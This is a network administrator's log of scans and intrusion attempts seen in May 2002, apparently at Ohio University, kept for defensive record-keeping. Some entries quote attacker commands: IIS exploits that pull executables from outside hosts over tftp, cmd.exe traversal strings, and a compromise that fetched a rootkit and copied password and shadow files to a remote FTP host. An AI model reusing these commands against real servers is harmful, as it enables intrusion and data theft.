Short summary of some of the attacks against us for May 2002.

time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/05/01-04:00:38.55 213.20.224.156 (port-213-20-224-156.reverse.qdsl-home.de) scannet for port 80
2002/05/01-14:35:18.51 68.81.146.233 (pcp01323128pcs.neave01.pa.comcast.net) scannet for port 21, anon ftp attack
2002/05/01-16:59:43.35 62.227.227.54 (p3EE3E336.dip.t-dialin.net) scannet for ports 21,80,1080
2002/05/01-17:54:35.53 172.171.21.176 (ACAB15B0.ipt.aol.com) scannet for port 21, anon ftp attack
2002/05/01-19:13:56.18 217.225.139.226 (pD9E18BE2.dip.t-dialin.net) scannet for port 80
2002/05/01-22:18:01.22 172.134.111.198 (AC866FC6.ipt.aol.com) use bad cgi to spam aol until 23:13:26.80
2002/05/02-02:58:50.18 24.150.16.120 (d150-16-120.home.cgocable.net) scannet for port 21
2002/05/02-03:29:50.51 213.29.206.30 (Isfahan University of Technology,IR) scannet for port 21
2002/05/02-04:16:16.53 65.67.115.141 (adsl-65-67-115-141.dsl.rcsntx.swbell.net) use bad cgi to spam aol all day long
2002/05/02-08:19:18.54 65.198.68.56 (netmapper.research.lumeta.com) spend all day mapping our network w/ping
2002/05/02-11:36:59.75 211.14.146.2 (PSINet Japan Inc.,JP) scannet for port 21
2002/05/02-14:04:04.11 200.247.112.214 (nfns02-0214.fns.embratel.net.br) scannet for port 21
2002/05/02-19:31:59.78 61.133.243.2 (CHINANET Qinghai province network) scannet for port 21
2002/05/02-20:48:08.08 212.160.105.66 (ns.indoor-group.com.pl) scannet for port 21
2002/05/03-14:20:51.28 81.65.55.70 (m70.net81-65-55.noos.fr) scannet for port 1433
2002/05/03-17:37:34.85 193.231.28.159 () scannet for port 21
2002/05/03-18:41:44.16 65.103.74.82 (U S WEST Communications Svcs, Inc.,MN,US) scannet for port 21
2002/05/03-23:09:50.73 212.244.10.37 (fastlane-3.zyb.citynet.pl) probe port 111/other on several ips, buff overflow
2002/05/04-00:38:06.68 216.3.1.7 (dyn006-ts8a.athens.frognet.net) portscan 132.235.1.12 (jmarion@prime)
2002/05/04-12:05:19.50 81.65.55.70 (m70.net81-65-55.noos.fr) scannet on port 1433
2002/05/04-15:04:07.83 213.93.117.23 (e117023.upc-e.chello.nl) scannet for port 21
2002/05/04-17:36:18.09 212.244.10.37 (fastlane-3.zyb.citynet.pl) probe port 111/other on several ips, buff overflow-statdx
2002/05/04-18:02:26.49 141.211.239.226 (ccmail.bus.umich.edu) scannet for port 1433
2002/05/04-18:05:07.08 141.211.239.226 (ccmail.bus.umich.edu) scannet for port 1433
2002/05/04-22:11:17.63 80.132.188.211 (p5084BCD3.dip.t-dialin.net) scannet for port 21
2002/05/04-23:16:32.53 134.60.20.37 (peanut7.e-technik.uni-ulm.de) scannet for port 21
2002/05/04-23:16:33.50 134.60.20.37 (peanut7.e-technik.uni-ulm.de) scannet on port 21
2002/05/05-03:58:40.24 210.50.24.84 (084.d.002.pth.iprimus.net.au) 1. attack IIS server w/buff overflow w/cmds to ftp to 66.28.32.12 port 9876
2002/05/05-03:58:40.24 210.50.24.84 (084.d.002.pth.iprimus.net.au) 2. login/passwd test/test and get ServUDaemon.*
2002/05/05-04:04:42.06 193.40.129.31 (ws-3.oppeosakond.artun.ee) scan net port 80, IIS buff overflow attack all ips
2002/05/05-05:35:09.69 66.188.102.142 (66-188-102-142.mad.wi.charter.com) scannet for port 21
2002/05/05-07:02:42.85 212.185.238.10 (pD4B9EE0A.dip.t-dialin.net) scannet for port 1433
2002/05/05-10:30:25.78 64.85.15.91 (SecureWebs, Inc.,Colville, WA,US) scannet for port 21 (Yea, secure alright)
2002/05/05-13:25:45.41 195.225.8.113 (pc113.mediafront.no) scannet port 80, IIS buff overflow attack all ips
2002/05/05-14:18:58.13 62.123.0.90 (ppp-62-123-0-90.dial.ipervia.it) scannet for port 21,23,111
2002/05/05-16:19:08.86 80.14.122.172 (ANice-203-1-3-172.abo.wanadoo.fr) scannet for port 21, 137
2002/05/06-06:16:25.34 202.188.93.224 (TMnet Telekom Malaysia,MY) try to login to 132.235.17.17 as root/root
2002/05/06-06:57:00.40 80.200.160.49 (80-200-160-49.adsl.powered-by.skynet.be) scannet for port 21
2002/05/06-09:47:47.57 203.106.165.160 (TMnet Telekom Malaysia,MY) scannet for ports 79,161,1524
2002/05/06-14:30:24.64 172.186.182.30 (ACBAB61E.ipt.aol.com) scannet for port 21
2002/05/06-15:24:54.42 128.134.55.62 (korea crap) scannet for port 445
2002/05/06-15:29:45.75 161.184.166.208 (edtn009860.hs.telusplanet.net) scannet for port 445
2002/05/07-00:26:03.80 202.151.224.45 (Maxis Communications Berhad ISP) scannet for ports 79,161,1524
2002/05/07-07:03:35.70 209.12.240.200 (Zebra Net, Inc.,AL,US) scan several ips for port 111
2002/05/07-10:37:06.37 217.128.97.164 (ALyon-102-1-4-164.abo.wanadoo.fr) scannet for port 21
2002/05/07-11:25:50.04 80.132.81.255 (p508451FF.dip.t-dialin.net) login to hacked machine via ftp on servuftp server.
2002/05/07-21:52:23.01 61.147.44.133 (CHINANET Jiangsu province network,CN) scannet for port 80, try cmd.exe execute on all ips
2002/05/07-21:57:47.42 62.212.119.229 (aboukir-102-1-30-229.adsl.nerim.net) scannet for port 21
2002/05/07-22:37:13.88 61.78.51.202 (CENTRAL DATA COMMUNICATION OFFICE,seoul,kr) scannet for port 60001
2002/05/07-23:56:34.42 217.136.135.18 (adsl-67346.turboline.skynet.be) scannet for port 21, anon ftp attack
2002/05/08-04:36:20.46 66.130.202.85 (modemcable085.202-130-66.que.mc.videotron.ca) scannet for port 21
2002/05/08-04:36:45.23 195.129.24.17 (Global Telelink Gmbh, Zürich,EU) scannet for port 80
2002/05/08-14:11:53.08 193.108.80.149 (ZEBRAHOSTSNET,GB) scannet for port 6112, buff overflow attacks dtspc
2002/05/08-15:45:23.82 62.62.191.128 (9 Telecom,FR) scannet for port 21
2002/05/08-16:53:30.81 62.62.212.15 (9 Telecom,FR) scannet for port 21, anon ftp attacks
2002/05/08-21:01:00.93 66.130.202.85 (modemcable085.202-130-66.que.mc.videotron.ca) scannet for port 21
2002/05/08-22:27:06.98 61.147.43.140 (CHINANET Jiangsu province network) attack iis server w/ tftp%20-i%20132.235.32.111%20GET%20cool.dll
2002/05/08-22:28:13.39 66.110.145.80 (adsl-66.110.145-80.globetrotter.net) scannet for port 80
2002/05/09-01:24:39.20 66.110.154.10 (adsl-66-110-154-10.globetrotter.net) attack iis server w/ tftp+-i+66.110.154.10+get+iss.exe+
2002/05/09-01:44:46.21 208.177.150.80 (w080.z208177150.chi-il.dsl.cnc.net) scannet for port 515
2002/05/09-02:53:47.84 61.147.44.142 (CHINANET Jiangsu province network) heavy scans port 80 w/ cmd.exe access attacks
2002/05/09-03:55:44.05 213.9.177.58 (Auto Saenz SA,ES) scannet for port 80
2002/05/09-11:18:59.06 132.235.206.177 (dhcp-206-177.cns.ohiou.edu) scannet for port 139
2002/05/09-12:23:41.40 211.60.219.140 (DACOM,SEOUL,KR) ICMP Broadscan Smurf Scanner
2002/05/09-13:37:52.64 80.116.237.153 (Telecom Italia, IT) scan for ports 21, 6667, 23
2002/05/09-14:09:48.36 195.194.144.18 (pursglove.ac.uk) scannet for port 80
2002/05/09-14:39:10.17 80.129.179.91 (p5081B35B.dip.t-dialin.net) scannet for ports 21, 80, 1080
2002/05/09-17:26:17.27 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 138, 80
2002/05/09-20:42:03.35 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 139,80,445 multiple passes
2002/05/09-21:42:16.30 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scannet for port 161
2002/05/09-22:32:13.30 217.136.132.54 (217-136-132-54.skynet.be) scannet for port 21
2002/05/10-03:28:04.58 61.147.47.196 (CHINANET Jiangsu province network,CN) some moron still trying to use 132.235.1.70 for dns
2002/05/10-06:31:40.79 202.100.68.22 (Feitian Internet Company,GANSU,CN) scannet for port 111, sadmind attack
2002/05/10-07:30:43.78 217.136.133.239 (adsl-67055.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/05/10-07:30:48.55 217.136.133.239 (adsl-67055.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/05/10-07:52:24.74 80.143.206.46 (p508FCE2E.dip.t-dialin.net) scannet for port 21, anon ftp attacks
2002/05/10-08:45:10.41 63.127.7.122 (Alfanumeric, S.A.,MANAGUE,US) scannet for port 21
2002/05/10-09:19:26.10 128.39.154.131 (Norwegian Telecommunications Administration) scannet for port 80
2002/05/10-10:08:01.97 66.148.227.106 (66.148.227.106.nw.nuvox.net) scannet for port 21
2002/05/10-10:17:10.87 67.104.186.130 (XO Communications,CA,US) scannet for port 21
2002/05/10-10:21:31.95 218.51.176.101 (Hanaro Telecom Co.,KOREA) scannet for port 21
2002/05/10-11:09:02.27 210.6.68.147 (210006068147.ctinets.com) scannet for port 21
2002/05/10-17:48:57.39 65.92.12.234 (HSE-Hamilton-ppp3514061.sympatico.ca) scannet for port 139 - SMB C drive access
2002/05/10-19:04:33.19 217.39.86.90 (host217-39-86-90.in-addr.btopenworld.com) scannet for port 139 - SMB C drive access
2002/05/10-20:51:40.13 68.41.50.45 (bgp946235bgs.canton01.mi.comcast.net) scan 132.235.1.11 for port 8080
2002/05/10-22:14:04.50 212.187.126.80 (c126080.upc-c.chello.nl) scannet for ports 80, 139, 3389
2002/05/11-04:15:42.26 61.138.232.12 (CHINANET xinjiang province network,CN) attack IIS server w/buff overflow attacks-sadmind
2002/05/11-04:46:54.99 66.13.183.52 (bdsl.66.13.183.52.gte.net) scannet for port 21
2002/05/11-05:10:19.65 61.147.47.196 (CHINANET Jiangsu province network,CN) try to use 132.235.1.70 as dns
2002/05/11-07:07:27.54 61.147.48.1 (CHINANET Jiangsu province network,CN) try to use 132.235.1.70 as dns
2002/05/11-07:43:18.97 65.69.127.203 (adsl-65-69-127-203.dsl.tulsok.swbell.net) scannet for port 21
2002/05/11-07:50:01.25 203.249.33.9 (Kyungki Junior College,KR) attack 2 machines w/ snmpXdmi buff overflow attack
2002/05/11-21:58:35.25 172.184.84.167 (ACB854A7.ipt.aol.com) scannet for port 80
2002/05/11-22:20:17.63 211.207.15.59 (Hanaro Telecom Co.,KOREA) scannet for port 21, anon ftp attacks
2002/05/11-23:01:10.62 216.72.215.31 (TVCABLE,BOGOTA,CO) scannet for port 21,515
2002/05/13-15:31:24.02 200.50.121.164 (50-121-164.adsl.cust.tie.cl) scannet for port 21
2002/05/12-15:41:39.16 62.147.159.91 (nas-cbv-8-62-147-159-91.dial.proxad.net) portscan 1 ip
2002/05/12-15:50:43.48 80.14.211.141 (ALimoges-101-1-5-141.abo.wanadoo.fr) scannet for port 21
2002/05/12-22:26:25.38 61.147.44.140 (CHINANET Jiangsu province network,CN) 1. attack iis server with command:
2002/05/12-22:26:25.38 61.147.44.140 (CHINANET Jiangsu province network,CN) 2. tftp%20-i%20132.235.32.111%20GET%20cool.dll
2002/05/13-05:04:33.70 134.68.75.176 (dhcp-ip-134-68-75-176.ip.iupui.edu) scannet for port 111
2002/05/13-05:56:23.61 134.68.75.176 (dhcp-ip-134-68-75-176.ip.iupui.edu) scannet for port 111
2002/05/13-11:47:40.23 193.253.230.33 (ALyon-102-1-2-33.abo.wanadoo.fr) scannet for port 21, anon ftp attacks
2002/05/13-17:27:02.04 64.246.26.137 (Everyones Internet, Inc.,TX,US) scannet for port 21
2002/05/14-03:44:08.70 211.177.141.4 (HANARO Telecom,SEOUL, KR) scannet for port 21, anon ftp attacks
2002/05/14-06:17:17.33 172.183.240.24 (ACB7F018.ipt.aol.com) ping scan of net
2002/05/14-09:02:56.13 132.235.18.55 (stocker hall, OHIOU) scannet for port 80,110,139
2002/05/14-10:41:43.05 80.116.199.168 (Telecom Italia Net,IT) scannet for port 21,22,23
2002/05/14-11:19:49.06 80.116.199.168 (Telecom Italia Net,IT) scannet for port 21,22,23
2002/05/14-11:50:19.03 148.235.37.135 (Programatica y Sistemas,MX) scannet for port 515
2002/05/14-12:24:45.70 212.239.202.130 (u212-239-202-130.adsl.pi.be) scannet for port 21, anon ftp attacks
2002/05/14-13:34:29.05 132.241.6.237 (California State University, Chico,CA,US) scannet for port 1214
2002/05/14-14:29:00.40 162.130.1.254 (host254.marriott.com) ftp to 132.235.17.17, login as root (no pwd, abc@hotmail.com), guest/guest
2002/05/14-14:53:03.11 62.211.252.159 (Telecom Italia,IT) scannet for port 21,22,23
2002/05/14-15:51:13.25 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 139,80
2002/05/14-16:58:51.08 65.31.37.148 (dhcp065-031-037-148.woh.rr.com) scannet for port 21
2002/05/14-18:54:00.77 212.211.90.13 (fra-tgn-oyk-vty13.as.wcom.net) scannet for port 23
2002/05/14-21:45:31.82 80.11.175.39 (ALille-205-1-1-39.abo.wanadoo.fr) scannet for port 21
2002/05/14-23:06:25.41 62.30.230.227 (pc-62-30-230-227-sc.blueyonder.co.uk) scannet for port 80
2002/05/14-23:30:36.84 168.115.37.203 (dhackerz.donga.ac.kr) scannet for port 21
2002/05/15-00:39:06.32 208.61.90.149 (adsl-61-90-149.mia.bellsouth.net) scannet for port 1214
2002/05/15-04:30:54.99 62.62.188.93 (9TELECOM,FR) scannet for port 21
2002/05/15-06:02:37.63 61.177.251.125 (CHINANET Jiangsu province network,CN) scannet for port 80
2002/05/15-09:30:45.13 132.235.18.55 (dhcp-018-055.cns.ohiou.edu) scan net ports 80,139
2002/05/15-10:19:50.23 61.147.48.73 (CHINANET Jiangsu province network,CN) still try to use 132.235.1.70 as dns
2002/05/15-10:36:32.08 168.115.37.203 (dhackerz.donga.ac.kr) scan net port 21
2002/05/15-11:46:54.10 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scan net ports 239
2002/05/15-11:59:55.30 206.23.240.99 (Tennessee Board of Regents,TN,US) scannet for port 80,8000
2002/05/15-12:06:41.20 80.11.175.39 (ALille-205-1-1-39.abo.wanadoo.fr) scan net port 21
2002/05/15-14:29:03.74 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) DNS zone transfer
2002/05/15-14:34:44.00 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) scan net ports 21,23, 6112
2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 1. hack into topdog via second inetd.
2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 2. Try to open xterm to 200.56.216.90:0.0
2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 3. ftp to ebp.flnet.org port 621 (ebp/..lxxekslxxeks),
2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 4. get rootkit, copy passwd & shadow files to ebp.
2002/05/15-14:36:25.62 148.223.69.181 (customer-148-223-69-181.uninet.net.mx) 5. set passwd on adm. set up trojan login program.
2002/05/15-16:07:32.49 194.149.72.188 (envirtual.com) scannet for port 21
2002/05/15-18:51:01.54 200.74.23.1 (pc320-200-74-23-1.apoquindo2.pc.metropolis-inter.com) scannet for port 1214
2002/05/15-21:11:57.94 209.207.210.175 (sanproject.dn.net) scannet for port 21
2002/05/16-02:53:02.97 65.119.129.142 (INFO AVENUE INTERNET SERVICES,IN,US) scannet for port 1214
2002/05/16-10:47:35.03 132.235.18.55 (dhcp-018-055.cns.ohiou.edu) scannet for port 80,110,139
2002/05/16-14:51:05.09 66.123.162.118 (MichaelSchiffman,ca) DNS named version attempt
2002/05/16-17:26:49.51 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) scannet for port 80
2002/05/16-17:27:34.28 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) 1. attack IIS server with command:
2002/05/16-17:27:34.28 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) 2. tftp.exe+"-i"+212.143.218.174+get+WINMGNT.EXE+c:\Inetpub\WINMGNT.EXE
2002/05/16-17:59:08.31 213.105.221.116 (pc3-ware3-0-cust116.ltn.cable.ntl.com) scannet for port 1214
2002/05/16-18:21:21.18 212.143.218.174 (ADSLP218-NV64A-p174.adsl.netvision.net.il) attack iis server w/ same tftp as before
2002/05/16-20:42:26.01 24.208.182.203 (dhcp024-208-182-203.columbus.rr.com) portscan 132.235.17.1
2002/05/16-21:28:16.89 193.224.148.251 (jatek.szgti.kando.hu) scannet for port 22
2002/05/17-00:38:35.12 132.235.207.152 (dhcp-207-152.cns.ohiou.edu) scannet for port 139
2002/05/17-07:22:13.38 12.231.196.54 (12-231-196-54.client.attbi.com) scannet for ports 80,21,23,25
2002/05/17-15:34:05.61 195.242.13.183 (spb-1-183.dialup.rcom.ru) scannet for port 1080
2002/05/17-16:22:17.17 193.251.47.240 (ALagny-101-1-1-240.abo.wanadoo.fr) ping scan of net, anon ftp attacks
2002/05/17-16:22:20.21 193.251.47.240 (ALagny-101-1-1-240.abo.wanadoo.fr) scannet for port 21
2002/05/17-16:40:08.50 128.175.112.246 (University of Delaware,DE,US) ICMP Broadscan Smurf Scanner
2002/05/17-17:50:44.37 138.245.80.67 (rheuma.ibe.med.uni-muenchen.de) scannet for port 80
2002/05/18-00:13:38.04 208.251.168.130 (Ndosa Technologies,NJ,US) scannet for port 80
2002/05/18-01:33:22.24 67.83.91.243 (ool-43535bf3.dyn.optonline.net) scannet for port 1214
2002/05/18-04:04:37.07 212.10.223.198 (pc46198.stofanet.dk) scannet for port 1433
2002/05/18-12:45:48.32 217.136.117.22 (adsl-62742.turboline.skynet.be) scannet for port 21
2002/05/19-00:43:59.51 172.186.30.196 (ACBA1EC4.ipt.aol.com) scannet for port 80
2002/05/19-04:32:09.10 68.5.246.244 (ip68-5-246-244.oc.oc.cox.net) scannet for port 21
2002/05/19-05:01:04.24 217.229.139.45 (pD9E58B2D.dip.t-dialin.net) scannet for port 21
2002/05/19-11:14:35.88 148.223.145.100 (mcortes.micro-tec.com.mx) scannet for port 6112
2002/05/19-12:48:30.97 61.208.208.242 (Link Bldg. Hoshukanri Maintenance,JP) scannet for port 21
2002/05/19-13:33:09.20 24.158.3.51 (24-158-3-51.mazo.wi.charter.com) scannet for port 1214
2002/05/19-15:50:34.24 130.209.132.172 (penguin.molgen.gla.ac.uk) scannet for port 21
2002/05/20-09:16:09.57 24.158.242.174 (ip-242-174.charterpa.com) scannet for ports 3128,8080,80
2002/05/20-20:28:09.71 211.146.127.35 (China Cablecasting Information and Network Co.,Ltd.,BEINING,CN) scannet for port 22
2002/05/21-00:27:44.10 24.127.107.234 (c-24-127-107-234.we.client2.attbi.com) scannet for port 1214
2002/05/19-16:43:53.08 24.158.242.174 (ip-242-174.charterpa.com) scan several servers for ports 80, 3128, 8080
2002/05/19-18:28:21.56 211.101.129.229 (Twenty One century software CO., LTD.,BEIJING, CN) scannet for port 22
2002/05/19-23:09:03.48 212.198.0.97 (celsius.noos.net) scannet for port 80
2002/05/19-23:31:24.83 24.73.100.239 (239.100.73.24.cfl.rr.com) scannet for port 1214
2002/05/20-00:05:41.80 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) portscan ace
2002/05/20-00:44:32.42 61.63.194.129 (Internet Solution Labs.,Taipei Taiwan) scannet for port 6112
2002/05/20-00:45:38.08 194.3.89.48 (REGIE COMMUNALE DU CABLE ET DE L ELECTRI,FR) scannet for port 21
2002/05/20-01:42:08.05 63.231.99.48 (clspdialnas19poolc48.clsp.uswest.net) probe port 6346 on network hp printer
2002/05/20-01:42:35.66 172.167.188.20 (ACA7BC14.ipt.aol.com) probe port 6346 on network hp printer
2002/05/20-01:45:52.36 172.143.205.21 (AC8FCD15.ipt.aol.com) probe port 6346 on network hp printer
2002/05/20-10:20:00.20 212.198.0.97 (celsius.noos.net) attack iis server w/ 81.65.18.35+GET+admin.exe+c:/inetpub/adminscripts/admin.exe
2002/05/20-10:27:10.30 213.36.142.65 (Praxitel/Liberty Surf,FR) attack iis server w/ tftp+-i+213.36.142.65+get+spac.txt+d:\msimev71\spac.txt
2002/05/20-12:34:50.82 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515
2002/05/20-16:35:37.31 209.162.231.73 (73.231.aragorn.worldwithoutwire.com) scannet for port 1433
2002/05/20-20:12:48.77 67.8.30.105 (105.30.8.67.cfl.rr.com) scannet for port 1214
2002/05/20-22:24:11.72 12.249.91.82 (12-249-91-82.client.attbi.com) scannet for port 1214
2002/05/20-23:17:11.13 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KYONGGI,KR) scannet for port 515, attack lpd
2002/05/21-00:43:10.05 80.14.226.169 (APuteaux-106-1-4-169.abo.wanadoo.fr) scannet for port 21
2002/05/21-01:45:18.90 63.236.0.200 (Qwest Cybercenters,NJ,US) scannet for port 22
2002/05/21-04:36:05.00 12.84.236.26 (26.indianapolis-07rh15rt.in.dial-access.att.net) ping scan of net
2002/05/21-04:37:28.68 64.95.172.243 (Onvia.com,WA,US) scannet for port 1433
2002/05/21-06:23:32.41 216.254.90.46 (dsl254-090-046.nyc1.dsl.speakeasy.net) scannet for port 1433
2002/05/21-06:23:32.74 216.254.90.46 (dsl254-090-046.nyc1.dsl.speakeasy.net) scannet for port 1433
2002/05/21-13:20:35.02 212.185.252.67 (cw03.F1.srv.t-online.de) attack IIS server w/ +mkdir+d:\temp\ext443
2002/05/21-15:17:28.04 195.19.19.39 (Russian Science & Productional Alliance,RU) scannet for port 22
2002/05/21-19:24:46.88 200.56.150.136 (customer-VER-150-136.megared.net.mx) attack server with telnet buff overflow attack
2002/05/21-19:24:54.16 64.67.236.31 (cyber3dnet.com) probe port 111 on several machines
2002/05/21-19:48:08.73 210.117.126.228 (s210-117-126-228.thrunet.ne.kr) scannet for port 1433
2002/05/21-21:43:36.21 208.138.159.171 (lifebody.com) scannet for port 1433
2002/05/22-00:37:49.12 144.118.219.145 (n2-219-145.resnet.drexel.edu) scannet for port 1214
2002/05/22-01:04:26.68 148.235.232.176 (daol-148-235-232-176.atdn.aol.com) scannet for port 27374
2002/05/22-09:02:38.59 208.177.157.114 (w114.z208177157.sjc-ca.dsl.cnc.net) scannet for port 22
2002/05/22-11:51:29.34 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) scannet with ICMP superscan echo
2002/05/22-12:27:46.66 128.100.9.37 (genova.control.utoronto.ca) pound on 132.235.1.89:8000
2002/05/22-14:50:08.31 132.235.207.152 (dhcp-206-152.cns.ohiou.edu) scannet on port 139
2002/05/22-16:10:14.77 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) 1. scannet for IIS, attack IIS w/ command:
2002/05/22-16:10:14.77 208.61.89.73 (adsl-61-89-73.mia.bellsouth.net) 2. echo+meep-meepwinnt/system32/cmd.exe?/c+echo+meep-meep
2002/05/22-16:55:26.09 68.32.209.96 (pcp01950396pcs.sabrna01.az.comcast.net) scannet for port 1214
2002/05/22-18:37:16.09 132.235.206.198 (dhcp-206-198.cns.ohiou.edu) scannet on port 139
2002/05/22-21:39:42.33 132.235.206.177 (dhcp-206-177.cns.ohiou.edu) scannet on port 139
2002/05/23-00:24:35.06 132.235.206.153 (dhcp-206-153.cns.ohiou.edu) scannet on port 139
2002/05/23-01:33:31.89 212.154.148.25 (Kazakhtelecom Data Network Administration,KZ) scannet for port 1433, SQL attacks.
2002/05/23-02:43:50.14 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) scannet with netbios-name-query
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 1. scannet for port 137, 139, 53, 21, 1433, portscan servers
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 2. ping scan net, netbios-name-query scan of net,
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 3. icmp-subnet_mask_request scan, icmp-timestamp_request scan
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 4. icmp-information_request
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 5. multiple cgi script accesses
2002/05/23-08:27:19.33 132.235.176.194 (dhcp-176-194.west-green.ohiou.edu) 6. IIS server cmd.exe attacks, get /etc/passwd,
2002/05/23-12:56:52.10 198.145.178.16 (zolfaqar.portnet.net) scannet for port 1433
2002/05/23-12:58:20.76 12.231.196.54 (12-231-196-54.client.attbi.com) scan 132.235.4.204 for ports 1433, 80, 9100, 23, 515, 1080, 3128, 8080
2002/05/23-13:27:23.09 213.24.99.3 (02rus.ru) scannet for port 21
2002/05/23-21:59:06.69 217.210.30.203 (h203n1fls32o271.telia.com) scannet for port 1433
2002/05/23-21:59:23.05 217.199.164.176 (ns.server2host.co.uk) scannet for port 1433
2002/05/23-21:59:48.41 195.117.150.139 (PROTERIANS s.c.,GDYNIA,PL) scannet for port 53
2002/05/23-21:59:48.61 195.117.150.139 (PROTERIANS s.c.,GDYNIA,PL) scannet for port 21
2002/05/24-03:59:59.84 61.147.47.196 (CHINANET Jiangsu province network,CN) probe 132.235.1.20 ports 445,139,137
2002/05/24-06:36:15.55 12.40.188.9 (REDWOOD TELEPHONE,US) scannet for port 80
2002/05/24-07:56:12.50 216.175.255.21 (216-175-255-21.client.dsl.net) scannet for port 1433
2002/05/24-08:02:00.09 216.175.255.21 (216-175-255-21.client.dsl.net) scannet for port 1433
2002/05/24-08:24:52.59 80.11.24.230 (AOrleans-201-1-1-230.abo.wanadoo.fr) scannet for port 21
2002/05/24-08:35:10.77 24.166.129.137 (wks-166-129-137.kscable.com) scannet for port 21
2002/05/24-09:55:20.59 64.166.90.23 (64-166-90-23.ded.pacbell.net) scannet for port 21
2002/05/24-10:02:40.09 213.156.32.125 (socks3.fastwebnet.it) try to connect to printer, multiple ports
2002/05/24-11:42:53.80 148.235.37.135 (customer-148-235-37-135.uninet.net.mx) scannet for port 515
2002/05/24-12:21:32.57 211.220.41.57:1080 (korea crap) scannet for port 1080
2002/05/24-14:46:27.44 209.222.212.44 (CE1-P-UNET.unet.maine.edu) scannet for port 80
2002/05/24-14:47:33.14 209.222.212.43 (CE2-P-UNET.unet.maine.edu) scannet for port 80
2002/05/24-14:53:17.06 169.244.19.138 (ce1-o-msln.msln.net) scannet for port 80
2002/05/24-14:55:02.24 205.151.67.151 (67-151.tr.cgocable.ca) scannet for port 53
2002/05/24-18:50:34.57 218.46.51.196:137 (CBCba-159p196.ppp13.odn.ad.jp) scannet for netbios-name-query
2002/05/24-22:09:20.17 217.84.122.62 (pD9547A3E.dip.t-dialin.net) scannet for port 80
2002/05/24-23:02:21.08 217.243.174.133 (OSI SOFTWARE GmbH,DE) scannet for port 1433
2002/05/24-23:23:29.61 212.145.4.89 (proxy-mad.comunitel.net) map net with slow scan of net
2002/05/24-23:23:31.48 65.94.167.38 (MTL-HSE-ppp186274.qc.sympatico.ca) start of intense netscan/multiple attacks on port 80
2002/05/25-01:29:24.24 129.255.65.68 (The University of Iowa,Iowa,US) scannet for port 80
2002/05/25-02:34:50.19 62.226.36.179 (p3EE224B3.dip.t-dialin.net) scannet for port 80
2002/05/25-06:15:44.59 210.134.73.42 (Y-MAX Systems,JP) scannet for port 21
2002/05/25-10:31:57.16 66.120.108.27 (adsl-66-120-108-27.dsl.sndg02.pacbell.net) scannet for port 21
2002/05/25-10:35:17.06 213.30.188.2 (COMPLETEL SAS France, FR) multiple IIS attacks against IIS server
2002/05/25-11:13:51.76 63.168.211.1 (IMPAQ COMPUTER CORP,DE,US) scannet for port 1080
2002/05/25-11:43:41.42 151.29.82.148 (ppp-148-82.29-151.libero.it) scannet for port 21, ping
2002/05/25-11:44:42.36 151.29.82.148 (ppp-148-82.29-151.libero.it) probe 132.235.4.250 ports 21,22,23
2002/05/25-11:46:24.91 151.29.82.148 (ppp-148-82.29-151.libero.it) ICMP echo scan of net
2002/05/25-12:44:15.35 217.35.43.11 (host217-35-43-11.in-addr.btopenworld.com) scannet for port 80
2002/05/25-15:50:35.20 141.217.35.64 (felix.physics.wayne.edu) scannet for port 80
2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 1. IIS attack. Create a script to:
2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 2. ftp to strobe.dynu.com as temp/temp123. get nc.exe,
2002/05/25-16:45:22.01 210.175.52.100 (Echna Systems Co.,Ltd.,JP) 3. systray.exe, servudaemon.ini.
2002/05/25-18:23:31.64 195.101.33.125 (Reseaux d'Acces a l'INternet,FR) scannet for port 1433
2002/05/26-00:53:37.32 144.206.177.32:21 (sea.mbslab.kiae.ru) scannet for port 21
2002/05/26-01:33:43.06 61.206.128.61 (Japan Medical Abstracts Society) scannet for port 21
2002/05/26-02:58:37.53 211.114.0.252 (CIVIL ENGINEERING RESERCH INFORMATION CENTER,KR) scannet for port 515
2002/05/26-03:24:14.35 24.199.80.137 (Earthlink, Inc.,GA,US) scannet for port 80
2002/05/26-06:31:17.31 212.7.14.240 (dhcp-14-240.cable.infonet.ee) scannet for port 80
2002/05/26-07:50:45.19 212.95.76.38 (ip-76-38.evc.net) scannet for port 80
2002/05/26-11:00:27.77 61.152.210.190 (Shanghai DigitalCom Information Industry Co., Ltd,CN) scannet for port 21
2002/05/26-11:35:46.24 66.25.58.219 (cs662558-219.houston.rr.com) scannet for port 21, anon ftp attack
2002/05/26-13:18:49.60 132.235.206.198 (dhcp-206-198.cns.ohiou.edu) scannet for port 139
2002/05/26-13:21:42.84 64.90.162.98 (abletohost.com) scannet for port 515
2002/05/26-14:47:00.16 62.83.79.201 (201-SEVI-30.libre.retevision.es) ping scan of net
